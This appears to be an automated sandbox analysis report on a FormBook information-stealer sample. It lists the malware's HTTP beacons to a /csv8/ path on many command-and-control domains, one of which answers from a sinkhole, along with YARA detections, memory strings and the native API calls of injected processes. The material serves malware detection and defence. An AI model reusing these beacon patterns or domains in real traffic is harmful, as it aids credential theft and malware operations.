Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1 | Host: www.epicmassiveconcepts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1 | Host: www.exit-divorce.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1 | Host: www.splendidhotelspa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1 | Host: www.stnanguo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1 | Host: www.alparmuhendislik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1 | Host: www.soundon.events | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 | Host: www.travelnetafrica.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 | Host: www.fessusesefsee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 | Host: www.queensboutique1000.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 45.77.226.209
Source: Joe Sandbox View, ASN Name: AUTOMATTICUS
Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View, ASN Name: OVHFR
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 | Host: www.travelnetafrica.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 | Host: www.fessusesefsee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 | Host: www.queensboutique1000.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1 | Host: www.studentdividers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1 | Host: www.logansshop.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1 | Host: www.epicmassiveconcepts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1 | Host: www.exit-divorce.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.herbmedia.net
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:16:25 GMT Server: X-SinkHole: Malware DNS SinkHole Server Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: explorer.exe, 00000006.00000003.291409665.00000000089DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmp | String found in binary or memory: http://logo.verisign
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004181C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00418270 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004182F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004181BA NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041826A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054095F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054096D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054099D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054098A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031083A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_03108270 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031082F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031081C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310826A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031081BA NtCreateFile,
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Code function: 0_2_00E58D5D
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Code function: 0_2_0303CAE4
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Code function: 0_2_0303EEA2
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Code function: 0_2_0303EEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B8A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C23F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C2AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C3DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041CC13
